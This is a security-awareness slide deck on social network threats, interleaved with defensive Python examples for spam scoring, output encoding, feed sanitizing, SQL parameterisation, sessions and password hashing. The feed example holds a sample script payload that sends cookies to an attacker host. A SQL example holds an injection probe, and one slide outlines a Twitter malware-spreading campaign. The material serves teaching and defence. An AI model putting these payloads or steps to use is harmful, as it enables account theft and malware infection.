SECURITY & PRIVACY ON SOCIAL NETWORKS

Omar M Alsuhaibany
CISSP, GCFA, ISO 27001 LA

It’s not only about Facebook :)
Before Social Networks

(image slide)
A Social Network definition

Wikipedia defines it as: A social network is a social structure made up of individuals (or organizations) called "nodes", which are tied (connected) by one or more specific types of interdependency, such as friendship, kinship, common interest, financial exchange, dislike, or relationships of beliefs, knowledge or prestige.
Examples of Social Networks?

- Facebook
- LinkedIn
- Twitter

Even more media:
- RSS feeds
- Blogs
- Wikis
- Web chat
- Podcasts
- Mashups
- Photo/video sharing
- Virtual worlds
Common Web 2.0 Vulnerabilities

- Phishing
- Spam
- Malware
- Cross-site scripting (XSS)
- SQL injection
- Authentication and authorization flaws
- Information leakage
- Insecure storage
- Insecure communications
Some Web 2.0-Specific Vulnerabilities

On top of that list there are some vulnerabilities specific to Web 2.0:
- XSS worms
- Feed injections
- Mashup and widget hacks
Well, first things first: Passwords!!!

- Is this a new problem? No, but it is different now.
- Password sloth: using the same password on several sites is like trusting the weakest link in a chain to carry the same weight.
- Worst of all is using the same password as your email account on a site where the login username is your email address: one phished site hands over the mailbox that every other account resets through.
- According to Facebook statistics, more than 50% of users reuse the same password.
- Avoid using the same password on multiple sites.
- Do not synchronize account information with your organization's login credentials.
Phishing

- Major phishing attempts:
  - A simple "look at this" message
  - Users directed to fbstarter.com, fbaction.net
  - Phished credentials used to automatically log in and send more mail
  - Some users report their passwords were changed
- PhishTank reports Facebook as the 7th most common target, behind only banks, PayPal and eBay
- "Social phishing" (a lure that appears to come from a friend) is far more effective
Phishing (cont’d)

- 72% success rate in a controlled study of social phishing
- No TLS on the login page
- No anti-phishing measures
- Frequent genuine emails with login links, which train users to click
- Users don't consider social network passwords valuable
- Web 2.0 sites encourage password sharing (e.g. asking for your email password to import contacts)…
- Facebook is doing a good job, but still!
Spam

- Spam is not only about advertising; annoying as it is, it is also a delivery channel for the phishing and malware covered below.
- All new types: followers, friend requests, fake accounts
Spam (cont’d)

- Fighting the spam:
  - Automatically detect spammer profiles:
    - analyze link history
    - analyze graph structure
    - analyze the profile
  - Aggressively request CAPTCHAs
  - User feedback
  - Classifiers:
    - string blocking
    - hashing
    - machine learning
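The three detection signals above (link history, graph structure, profile content with hashed string blocking) combined into one scorer, as an added example that is not from the deck. Profiles, weights, the shortener list and the blocklist are constructed assumptions for illustration; a real system tunes them on labelled reports and feeds the score into the CAPTCHA or review queue.

```python
"""Score profiles for spam likelihood from the three signals on the slide.

Added example, not from the original deck. The profiles, thresholds and
weights below are constructed for illustration; a real system would tune
them on labelled reports and feed the score into a CAPTCHA or review queue.
"""
import hashlib
import re
from collections import Counter
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SHORTENER_HOSTS = {"bit.ly", "j.mp", "tinyurl.com"}      # assumption: known shorteners


def fingerprint(text: str) -> str:
    """String blocking via hashing: normalise case/whitespace so trivial
    edits of the same spam template still collide on one fingerprint."""
    normalised = re.sub(r"\s+", " ", text.strip().lower())
    return hashlib.sha256(normalised.encode()).hexdigest()[:16]


# Constructed blocklist; in practice populated from user reports and takedowns.
BLOCKED_FINGERPRINTS = {fingerprint("free iPhone!! click here")}


@dataclass
class Profile:
    name: str
    followers: int
    following: int
    account_age_days: int
    messages: list = field(default_factory=list)   # list of (text, [urls])


def link_history_score(p: Profile) -> float:
    """Link history: links concentrated on one host and hidden behind shorteners."""
    urls = [u for _, us in p.messages for u in us]
    if not urls:
        return 0.0
    hosts = [urlsplit(u).netloc.lower() for u in urls]
    # only judge concentration once there are enough links to mean something
    concentration = Counter(hosts).most_common(1)[0][1] / len(hosts) if len(hosts) >= 4 else 0.0
    shortened = sum(h in SHORTENER_HOSTS for h in hosts) / len(hosts)
    return 0.4 * concentration + 0.6 * shortened


def graph_score(p: Profile) -> float:
    """Graph structure: follows many, followed by few, and brand new."""
    ratio = p.following / max(p.followers, 1)
    ratio_term = min(ratio / 50.0, 1.0)              # 50:1 saturates the signal
    age_term = 1.0 if p.account_age_days < 7 else 0.0
    return 0.7 * ratio_term + 0.3 * age_term


def content_score(p: Profile) -> float:
    """Profile content: blocked templates and near-duplicate posting."""
    texts = [t for t, _ in p.messages]
    if not texts:
        return 0.0
    blocked = sum(fingerprint(t) in BLOCKED_FINGERPRINTS for t in texts) / len(texts)
    repetition = 1.0 - len({fingerprint(t) for t in texts}) / len(texts)
    return max(blocked, repetition)


def spam_score(p: Profile) -> float:
    return round((link_history_score(p) + graph_score(p) + content_score(p)) / 3, 3)


def is_spammer(p: Profile, threshold: float = 0.5) -> bool:
    return spam_score(p) >= threshold


# Constructed sample profiles.
SPAMMER = Profile("win_iphone_now", followers=3, following=2000, account_age_days=2,
                  messages=[("Free iPhone!! Click here", ["http://bit.ly/abc1"])] * 5)
LEGIT = Profile("alice", followers=120, following=150, account_age_days=800,
                messages=[("Lunch with the team today", []),
                          ("New post on threat modeling", ["https://example.org/blog/tm"]),
                          ("Slides from my talk", ["https://example.org/slides"])])

if __name__ == "__main__":
    for p in (SPAMMER, LEGIT):
        print(p.name, spam_score(p), "SPAM" if is_spammer(p) else "ok")
```

The fingerprint step is what the slide calls string blocking plus hashing: the blocklist stores digests of normalised templates rather than raw text, so it can be shared between systems without shipping the spam itself, and small edits to a template still match. A machine-learning classifier would replace the hand-picked weights with ones learned from the same three feature groups.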
Cross-Site Scripting (XSS)

- New to Web 2.0? No
- Is this worse in Web 2.0? Yes
- XSS flaws occur whenever an application takes user-supplied data and sends it to a web browser without first validating or encoding that content.
XSS Worms

- New to Web 2.0? Yes
- Self-propagating XSS code injected into a web application, which spreads when users visit a page.
- The first XSS worm spread through MySpace 4 years ago (the 2005 Samy worm)
- 1 million+ infections in 24 hours
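The two slides above in code, as an added example that is not from the deck or from any real site: a toy profile page rendered once without output encoding and once with it, plus a toy "browser" that executes `<script>` blocks. The only action the toy script language knows is the worm's core move, copying its own markup into the viewer's profile (the real MySpace worm did this with XMLHttpRequest). Users, text and the `SELF_COPY` payload are constructed.

```python
"""Unencoded vs. encoded output, and why the unencoded path turns one
stored XSS into a worm.

Added example, not code from the deck or from any real site. It models a
profile page and a toy "browser" that executes <script> blocks; the only
action the toy script language knows is the worm's core move, copying its
own markup into the viewer's profile. All users and text are constructed.
"""
import html
import re

SCRIPT_RE = re.compile(r"<script>(.*?)</script>", re.IGNORECASE | re.DOTALL)
WORM = "<script>SELF_COPY</script>"        # constructed self-propagating payload


class ProfileSite:
    def __init__(self, encode_output: bool):
        self.encode_output = encode_output
        self.profiles = {}                  # username -> user-supplied "about me"

    def set_about(self, user: str, text: str) -> None:
        self.profiles[user] = text

    def render(self, user: str) -> str:
        """Vulnerable site echoes stored text verbatim; fixed site encodes it for
        the HTML element-content context it is inserted into."""
        about = self.profiles.get(user, "")
        if self.encode_output:
            about = html.escape(about, quote=True)
        return f'<h1>{html.escape(user)}</h1><div id="about">{about}</div>'


def toy_browser_visit(site: ProfileSite, viewer: str, target: str) -> bool:
    """Fetch target's page as viewer and run every <script> it contains.
    Returns True if the viewer's profile was modified (i.e. infected)."""
    for m in SCRIPT_RE.finditer(site.render(target)):
        if m.group(1).strip() == "SELF_COPY":
            site.set_about(viewer, m.group(0))   # the viewer now carries it
            return True
    return False


def simulate(encode_output: bool, rounds: int = 3) -> int:
    """Patient zero plants the worm in their own profile; each round every
    user views every other profile. Returns how many profiles carry the worm."""
    site = ProfileSite(encode_output)
    users = ["mallory", "alice", "bob", "carol", "dave"]
    for u in users:
        site.set_about(u, f"hi, I am {u}")
    site.set_about("mallory", WORM)
    for _ in range(rounds):
        for viewer in users:
            for target in users:
                if viewer != target:
                    toy_browser_visit(site, viewer, target)
    return sum(site.profiles[u] == WORM for u in users)


if __name__ == "__main__":
    print("unencoded:", simulate(encode_output=False), "infected")   # 5
    print("encoded:  ", simulate(encode_output=True), "infected")    # 1
```

With encoding off, one planted profile infects every user who views it within a single round, and each new carrier infects everyone who views them; with encoding on, the payload is displayed as text and only the attacker's own profile ever holds it. `html.escape` is the right fix only for text inserted as element content; data placed inside attributes, URLs or script blocks needs the encoding for that context.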
Feed Injections

- New to Web 2.0? Yes
- Feed aggregators receive data from various untrusted sources. The data being received can be malicious and exploit users.
- Remote zone risks:
  - Web browsers or web-based readers fall in this category
  - Attacks such as XSS and CSRF are possible
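One way a web-based reader can treat feed content as untrusted, as an added example that is not from the deck: parse a constructed RSS item with the standard library and rebuild its HTML description from an allowlist, so scripts, event handlers and `javascript:` links never reach the reader's page. The allowlist is an assumption for illustration. Caveat: `xml.etree` is not hardened against hostile XML (entity expansion), so real feeds should be parsed with `defusedxml`.

```python
"""Treat everything in a feed as untrusted before a web-based reader renders it.

Added example, not from the deck. Parses a constructed RSS item with the
standard library and rebuilds its HTML description from an allowlist, so
scripts, event handlers and javascript: links never reach the page. The
allowlist is an assumption for illustration.
"""
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = {"http", "https"}


class Sanitizer(HTMLParser):
    """Re-emit only allowlisted tags/attributes; all text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._dropped = 0      # >0 while inside <script>/<style>, whose text is discarded

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            if tag in ("script", "style"):
                self._dropped += 1
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                       # drops onclick, onerror, style, ...
            if name == "href" and urlsplit(value).scheme.lower() not in SAFE_SCHEMES:
                continue                       # drops javascript:, data:, vbscript:
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._dropped = max(self._dropped - 1, 0)
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._dropped:
            self.out.append(html.escape(data))


def sanitize_html(fragment: str) -> str:
    s = Sanitizer()
    s.feed(fragment)
    s.close()
    return "".join(s.out)


def parse_feed(xml_text: str) -> list:
    """Return items with title/description already safe for an HTML context."""
    root = ET.fromstring(xml_text)
    return [{
        "title": html.escape(item.findtext("title", default="")),
        "link": item.findtext("link", default=""),
        "description": sanitize_html(item.findtext("description", default="")),
    } for item in root.iter("item")]


# Constructed hostile feed: one item carrying several injection attempts.
FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Constructed feed</title>
<item>
<title>Look &amp; see</title>
<link>https://example.org/post/1</link>
<description><![CDATA[<p onclick="alert(1)">Hello <b>reader</b></p>
<script>document.location='http://attacker.example/?c='+document.cookie</script>
<a href="javascript:alert(1)">click</a> <a href="https://example.org/ok">ok</a>
<img src=x onerror="alert(1)">]]></description>
</item></channel></rss>"""

if __name__ == "__main__":
    for item in parse_feed(FEED):
        print(item["title"], "->", item["description"])
```

Relative links get no `href` under this allowlist (their scheme is empty); resolve them against the item's `<link>` first if you want to keep them. The CSRF half of the slide is not addressed by sanitizing: a feed can still carry an ordinary `<a href="https://site/delete?id=1">`, so state-changing actions on the reader's own site need anti-CSRF tokens regardless of what the feed contains.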
Mashup and Widget

- New to Web 2.0? Yes
- Mashups and widgets are core components of Web 2.0 sites. The rich functionality they provide can be exploited by attackers through attacks such as XSS.
Mashup and Widget (cont’d)

- The mashup site is the middleman: do you trust it?
- Multiple inputs, one output
- Mashup communications could leak data
- Mashups require cross-domain access
Information Leakage

- New to Web 2.0? No
- Is this worse in Web 2.0? Yes
- Applications can unintentionally leak information about their configuration or internal workings, or violate privacy, through a variety of application problems.
Information Leakage (cont’d)

- A simple lack of error handling leaks information:
  http://www.examplesite.com/home.html?day=Monday
- I add a little something onto the URL:
  http://www.examplesite.com/home.html?day=Monday AND userscolumn=2
- No error handling = information leakage. The page returns the raw database error:
  Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
  [Microsoft][ODBC SQL Server Driver][SQL Server] Invalid column name
  /examplesite/login.asp, line 10
- That one message confirms the input reaches a SQL Server query unfiltered, reveals the driver stack, and discloses the script path and line number.
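The error page above reproduced and then fixed, as an added example that is not from the deck. It uses an in-memory SQLite table instead of SQL Server, so the leaked text differs from the ODBC message on the slide, but the mechanism is the same: input concatenated into SQL and the raw database exception handed back to the browser. The fixed handler uses a parameterised query, returns a generic message and logs the detail server-side under a correlation id. The table, rows and probe string are constructed.

```python
"""The slide's error page, reproduced and then fixed.

Added example, not from the deck. Uses an in-memory SQLite table instead
of SQL Server; the mechanism (string-built SQL, raw exception to the
client) is the same. Table, data and probe are constructed.
"""
import logging
import sqlite3
import uuid

log = logging.getLogger("app")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE schedule (day TEXT, driver TEXT)")
    conn.executemany("INSERT INTO schedule VALUES (?, ?)",
                     [("Monday", "alice"), ("Tuesday", "bob")])
    return conn


def drivers_vulnerable(conn, day):
    """home.html?day=... as the slide shows it: string-built SQL, raw error out."""
    try:
        sql = f"SELECT driver FROM schedule WHERE day = '{day}'"   # injection point
        return 200, [r[0] for r in conn.execute(sql).fetchall()]
    except sqlite3.Error as exc:
        return 500, f"Database error: {exc}"        # leaks schema/driver details


def drivers_fixed(conn, day):
    """Parameterised query: the probe is just a value and never reaches the
    SQL parser. If something else fails, the user sees only a reference id."""
    try:
        rows = conn.execute("SELECT driver FROM schedule WHERE day = ?", (day,))
        return 200, [r[0] for r in rows.fetchall()]
    except sqlite3.Error as exc:
        ref = uuid.uuid4().hex[:8]
        log.error("ref=%s query failed: %s", ref, exc)   # detail stays on the server
        return 500, f"Something went wrong (ref {ref})"


PROBE = "Monday' AND userscolumn=2 --"   # constructed: the slide's probe, quoted for SQLite

if __name__ == "__main__":
    conn = make_db()
    print(drivers_vulnerable(conn, PROBE))   # (500, 'Database error: no such column: userscolumn')
    print(drivers_fixed(conn, PROBE))        # (200, [])
```

Note that the fixed handler does not merely hide the error: with a bound parameter the probe never produces one, because `userscolumn` is part of a string value rather than of the statement. The generic-message branch still matters for genuine failures (the database down, a table missing), and the reference id is what support uses to find the full exception in the server log.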
Information Leakage (cont’d)

- What makes this worse in Web 2.0?
- Business logic and validation have moved to the client side
- Web 2.0 apps do a lot of work on the client side: validation of data, business logic and handling of sensitive data
- You need to back these up with server-side checks
- Never assume sensitive data will be safe on the client side
Authentication and Authorization Flaws

- New to Web 2.0? No
- Is this worse in Web 2.0? Yes
- These flaws can lead to hijacking of user accounts and privilege escalation, undermine authorization and accountability controls, and cause privacy violations.
Authentication and Authorization Flaws (cont’d)

- Authentication and authorization weaknesses:
  - Passwords with no maximum age and no minimum length or complexity requirements
  - Lack of brute-force protection
  - Broken CAPTCHA systems
  - Security through obscurity
- Session management weaknesses:
  - Insufficient entropy in session IDs
  - Predictable session IDs
  - Insufficient timeouts and maximum lifetimes for session IDs
  - Using one session ID for the whole session (no rotation after login)
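The weaknesses in both lists above, next to code that avoids them, as an added example that is not from the deck. `WeakSessionStore` is the predictable, never-rotated id the slide warns about; `SessionStore` uses 256-bit ids from the OS CSPRNG, rotates the id on login (so a pre-login id can never be fixed on a victim), enforces idle and absolute timeouts, and locks an account after repeated failures. The limits and the injectable `clock` are illustrative assumptions.

```python
"""Login throttling and session handling that avoid the weaknesses listed.

Added example, not from the deck. Limits and the injectable clock are
illustrative assumptions.
"""
import secrets
import time

IDLE_TIMEOUT = 15 * 60       # seconds without activity before a session dies
MAX_LIFETIME = 8 * 3600      # absolute cap, however active the session is
MAX_FAILURES = 5             # failed logins per account before lockout
LOCKOUT_SECONDS = 15 * 60


class WeakSessionStore:
    """Counter-based ids: whoever sees one id can enumerate the others."""
    def __init__(self):
        self._next = 1000
        self.sessions = {}

    def create(self, user):
        sid = str(self._next)
        self._next += 1
        self.sessions[sid] = user
        return sid


class SessionStore:
    def __init__(self, clock=time.time):
        self.clock = clock
        self.sessions = {}   # sid -> {"user", "created", "last_seen"}
        self.failures = {}   # user -> (count, first_failure_time)

    @staticmethod
    def new_id() -> str:
        return secrets.token_urlsafe(32)          # 256 bits of CSPRNG output

    def login(self, user, password_ok, old_sid=None):
        """Return a fresh session id on success, None otherwise."""
        count, first = self.failures.get(user, (0, 0.0))
        if count >= MAX_FAILURES:
            if self.clock() - first < LOCKOUT_SECONDS:
                return None                        # locked: don't even check the password
            count, first = 0, 0.0                  # lockout expired, start a new window
        if not password_ok:
            self.failures[user] = (count + 1, first or self.clock())
            return None
        self.failures.pop(user, None)
        if old_sid:
            self.sessions.pop(old_sid, None)       # rotate: drop the pre-login id
        now = self.clock()
        sid = self.new_id()
        self.sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def resolve(self, sid):
        """Map a presented id to its user, enforcing both timeouts."""
        s = self.sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > MAX_LIFETIME:
            del self.sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def logout(self, sid):
        self.sessions.pop(sid, None)


if __name__ == "__main__":
    weak = WeakSessionStore()
    print("weak ids:", weak.create("alice"), weak.create("bob"))   # consecutive integers
    strong = SessionStore()
    print("strong id:", strong.login("alice", password_ok=True))
```

Per-account lockout as written is itself abusable (an attacker can lock a victim out by failing on purpose); production systems usually combine it with per-IP throttling, escalating delays or a CAPTCHA after a few failures rather than a hard lock. The rotation on login is what closes the "one session ID for the whole session" weakness: an id issued before authentication must never become an authenticated one.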
Authentication and Authorization Flaws (cont’d)

- What makes this worse in Web 2.0?
  - CAPTCHAs are relied on to provide strong authentication and authorization (A+A) but are often weak
  - More access points in Web 2.0 applications
  - The use of single sign-on creates a single point of failure
  - Growth in other attacks (XSS, phishing) further undermines A+A
Insecure Storage and Communications

- New to Web 2.0? No
- Is this worse in Web 2.0? Yes
- These flaws could allow sensitive data to be stolen if appropriate strong protections aren’t in place.
Insecure Storage and Communications (cont’d)

- Insecure storage of data:
  - Not encrypting sensitive data
  - Hard-coding keys and/or storing keys insecurely
  - Using broken protection mechanisms (e.g. DES)
  - Failing to rotate and manage encryption keys
- Insecure communications:
  - Not encrypting sensitive data in transit
  - Only using SSL/TLS for the initial logon request (the session cookie then travels in the clear)
  - Failing to protect keys while in transit
  - Emailing clear-text passwords
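The storage half of the list above, applied to the one secret every social network holds, as an added example that is not from the deck. The first pair of functions is the anti-pattern the slide describes (a reversible transform under a key that ships in the source, standing in for "encrypt with DES and a hard-coded key"): anyone holding code plus table recovers every password, and a password that can be recovered is one that can be emailed in clear text. The second set stores a salted, slow, one-way PBKDF2-HMAC-SHA256 digest and verifies it in constant time; the iteration count is an assumption to tune per deployment, and only the standard library is used.

```python
"""Store credentials so a stolen table does not yield the passwords.

Added example, not from the deck. The XOR pair is a deliberate
anti-pattern standing in for "reversible encryption with a hard-coded
key"; the PBKDF2 functions are the fix. ITERATIONS is an assumption.
"""
import base64
import hashlib
import hmac
import os

HARDCODED_KEY = b"s3cr3t-k3y-in-source"   # anti-pattern: the key is in the repo


def _xor(data: bytes) -> bytes:
    return bytes(b ^ HARDCODED_KEY[i % len(HARDCODED_KEY)] for i, b in enumerate(data))


def reversible_store(password: str) -> bytes:
    """Anti-pattern: looks encrypted in the database, trivially undone."""
    return _xor(password.encode())


def reversible_recover(blob: bytes) -> str:
    """What an attacker with the code and the table does to every row."""
    return _xor(blob).decode()


ITERATIONS = 600_000          # aim for ~100 ms per verify on your hardware


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    salt = os.urandom(16)     # per-user salt: equal passwords get different digests
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "$".join(["pbkdf2-sha256", str(iterations),
                     base64.b64encode(salt).decode(), base64.b64encode(dk).decode()])


def verify_password(password: str, stored: str) -> bool:
    try:
        algo, iters, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2-sha256":
        return False
    salt, expected = base64.b64decode(salt_b64), base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters), dklen=len(expected))
    return hmac.compare_digest(dk, expected)      # constant-time comparison


def needs_rehash(stored: str, iterations: int = ITERATIONS) -> bool:
    """Key management for hashes: raise the work factor on the next successful login."""
    algo, iters, *_ = stored.split("$")
    return algo != "pbkdf2-sha256" or int(iters) < iterations


if __name__ == "__main__":
    blob = reversible_store("hunter2")
    print("recovered from 'encrypted' column:", reversible_recover(blob))
    rec = hash_password("hunter2")
    print("stored:", rec)
    print("verify ok:", verify_password("hunter2", rec), "wrong:", verify_password("x", rec))
```

The self-describing `algo$iterations$salt$digest` record is what makes rotation possible: when the work factor is raised, `needs_rehash` flags old rows and each user's next successful login rewrites their record, with no bulk re-encryption and no key to rotate. For data that genuinely must be recoverable (not passwords), the same principle applies to the key: load it from a secrets store or environment at runtime, never from the source tree.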
Insecure Storage and Communications (cont’d)

- What makes this worse in Web 2.0?
  - More data in more places, including client-side storage
  - Mixing secure and insecure content on a page
- And now with the Cloud!!!
Browsing Habits and Experience have Changed…

- Trigger finger (clicking on everything). Inboxes contain everything from drink requests to cause requests; do not get into the click habit unless you are ready to deal with drive-by downloads and zero-day attacks.
A little on Privacy…

- 3rd-party apps on Facebook:
  - Anyone can create a Facebook app
  - Many of the agreements you must accept give the company the right to monitor your data and sell it without informing you
  - Tracking code can be built into any application
- Mixing personal with professional: common on Facebook, where one’s friends include business associates, family members and friends
- Engaging in Tweet (or Facebook/LinkedIn/MySpace) rage: imagine you are at a party where everyone is listening, including your boss, spouse and future employer
Data = $$$

- Steal your money directly
- Sell your data
- Trick your friends and family into supplying personal data
- Sell your identity
- Use your accounts to spread spam, malware and more data-theft scams
- Sell your organization's data or sensitive information
- Blackmail individuals and organizations
URL Shortener Risks

- bit.ly, hex.io, zi.ma, etc.
- Where will the URL take you?
- Dubious link via email? Hover your mouse over it or check the HTML
- A new way for email phishing scams
- DDoS with iframes
- Easily escapes spam filters
- Even more dangerous: what if the shortener site got hacked?
- "See before you click" functionality or extensions
- Example: j.mp
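A "see before you click" resolver, as an added example that is not from the deck or any shortener's own tooling. It follows HTTP redirects one hop at a time (never auto-following), caps the hop count, detects loops and reports the final host so a mail or chat filter can apply its own policy. The network fetcher uses `urllib`; the constructed redirect table and `fake_fetch` replay a chain offline, so the example runs without a network. Hostnames in the table are constructed.

```python
"""See where a shortened link goes before anyone clicks it.

Added example, not from the deck. Follows redirects one hop at a time,
caps hops, detects loops. FAKE_TABLE is a constructed stand-in for the
network so the example runs offline.
"""
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

MAX_HOPS = 5
REDIRECT_CODES = (301, 302, 303, 307, 308)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes urllib raise HTTPError on 3xx instead of following it.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, timeout=5):
    """One HEAD request; returns (status, Location header or None), never following."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get("Location")


def expand(url, fetch=http_fetch, max_hops=MAX_HOPS):
    """Walk the redirect chain; returns (chain, verdict) where verdict is
    'final', 'loop' or 'too-many-hops'."""
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if status not in REDIRECT_CODES or not location:
            return chain, "final"
        nxt = urljoin(chain[-1], location)      # Location may be relative
        if nxt in chain:
            return chain, "loop"
        chain.append(nxt)
    return chain, "too-many-hops"


def final_host(chain):
    return urlsplit(chain[-1]).netloc.lower()


# Constructed redirect table standing in for the network (hosts are invented).
FAKE_TABLE = {
    "https://bit.ly/abc": (301, "https://j.mp/def"),
    "https://j.mp/def": (302, "http://login-facebook.example/verify"),
    "http://login-facebook.example/verify": (200, None),
    "https://bit.ly/loop1": (301, "https://bit.ly/loop2"),
    "https://bit.ly/loop2": (301, "https://bit.ly/loop1"),
}


def fake_fetch(url):
    return FAKE_TABLE.get(url, (404, None))


if __name__ == "__main__":
    chain, verdict = expand("https://bit.ly/abc", fetch=fake_fetch)
    print(verdict, " -> ".join(chain))
    print("lands on:", final_host(chain))
```

Two points the one-liner "hover your mouse" advice misses: a shortener can chain into another shortener (hence the hop loop), and the final hop can change after the link was checked, which is the "what if the site got hacked" risk on the slide. Resolve at click time, not only at post time, and note that a HEAD request to an attacker's server also tells them the link is being inspected; filters that care route the check through a separate egress.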
Malware example: Koobface

- The Koobface worm and its associated botnet have gained notoriety in security circles for their longevity and history of targeting social networking sites. First surfacing in 2008 within MySpace and Facebook, the worm resurfaced in early 2009, this time targeting Twitter users.
- Using phishing techniques, the message directs recipients to a third-party website, where they are prompted to download what is purported to be an update of the Adobe Flash player.
- 11/10/2009: As part of a new Koobface attack, links to Google Reader URLs controlled by cyber-criminals are being spammed by Koobface onto social network sites, including Facebook and MySpace. The hundreds of Google accounts involved host a page with a fake YouTube video. Attempts to view this supposed video expose Windows users to infection by Koobface.
- Upon successful infection, Koobface ultimately attempts to gather sensitive information from victims, such as credit card numbers.
Facebook Widget Installing Spyware

- Prompts users to install the infamous "Zango" adware/spyware.
Twitter hacking example:

- Select a victim group using any one of a number of Twitter trend tools.
- Select malware based on device or location info.
- Upload the malware to dropbox.com and request a public link for the uploaded file.
- Use a URL shortening service to obfuscate the URL.
- Send a tweet to the target referencing the information, or post with keywords so that all individuals "tracking" the keywords are notified of a new tweet on the subject they are tracking.
Scareware Tweets

- Scareware is fake anti-virus: instead of protecting your computer it infects it
- Scammers create multiple tweets that direct you to a scareware page. They then try to frighten you into believing you have a security problem and need their software to address it
- Other scareware attacks aim to:
  - Take control of your computer to send spam
  - Hold your computer to ransom
- Result: malware infection
Security analysis difficulties with Web 2.0

- More code and complexity in Web 2.0 apps
- At least two languages to analyze (client and server)
- User-supplied code might never be reviewed
- Dynamic nature increases the risk of missing flaws
- Increased number of input points
Basics of Social Networking Security

- Never post personal information online
  - Everything you post is public information
  - If you don’t feel comfortable with everyone seeing it, then don’t put it online
- Configure security settings on all sites
  - Most websites you log into have security configurations
  - Set the privacy levels according to what you are posting
- Change your password regularly
  - Use phrases, not words
  - Do not keep a "master" password
- Never trust e-mails asking for personal information
  - An official organization will never ask you to disclose any private information in order to correct an error
Basics of Social Networking Security (cont’d)

- Do not friend anyone you do not know and trust
  - Hackers and spammers are more clever than you think. There is a reason many online scams are called "social engineering"
- Clean out your friend list regularly
- Watch for hacked friend accounts
  - Unusual posts or requests
  - Posting "shock sites"
- Beware of third-party apps
  - Many require you to sign an agreement giving them the right to sell your information
  - Malicious code can be written into the program
- Delete unused apps
  - If you are not using them, then why let them potentially mine data about you?
- If you are unsure about an app, a post or anything else, then Google is your best friend
Basics of Social Networking Security (cont’d)

- Be cautious about posting your location online
  - People can see where you will be and, more importantly, where you will not be
- Check your security settings monthly
  - Facebook sets all profiles to public with each site redesign
  - Apps may disable your security settings
  - Viruses and malware may disable your security settings
- Consider using private browsing
  - Private browsing lets you view websites without storing your history or keeping cookies after the session ends
  - Private browsing shortcuts:
    - Firefox: Ctrl + Shift + P
    - Internet Explorer 8: Ctrl + Shift + P
    - Opera: Ctrl + Shift + N
    - Google Chrome: Ctrl + Shift + N
- Don’t stay logged on
Basics of Social Networking Security (cont’d)

- Set your settings to high privacy and/or enable the security settings on the sites you use.
- Review a given website’s privacy policy; you may be surprised at what you are actually agreeing to.
- Log off when you leave.
- Install and update antivirus software.
- Keep system software AND applications up to date.
- Make sure the connection you use is secure.